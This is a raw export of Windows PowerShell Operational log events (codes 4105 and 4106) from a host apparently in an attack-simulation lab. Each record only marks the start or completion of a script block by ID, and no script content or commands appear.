Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469638
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469637
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469636
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469635
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469634
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469633
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469632
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469631
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469630
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469629
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469628
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469627
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469626
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469625
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469624
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469623
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469622
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469621
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469620
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469619
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469618
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469617
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469616
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469615
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469614
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469613
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469612
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469611
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469610
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469609
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469608
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469607
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469606
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469605
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469604
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469603
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469602
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469601
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469600
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469599
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469598
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469597
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469596
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469595
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469594
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469593
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469592
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469591
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469590
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469589
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469588
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469587
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469586
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469585
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469584
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469583
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
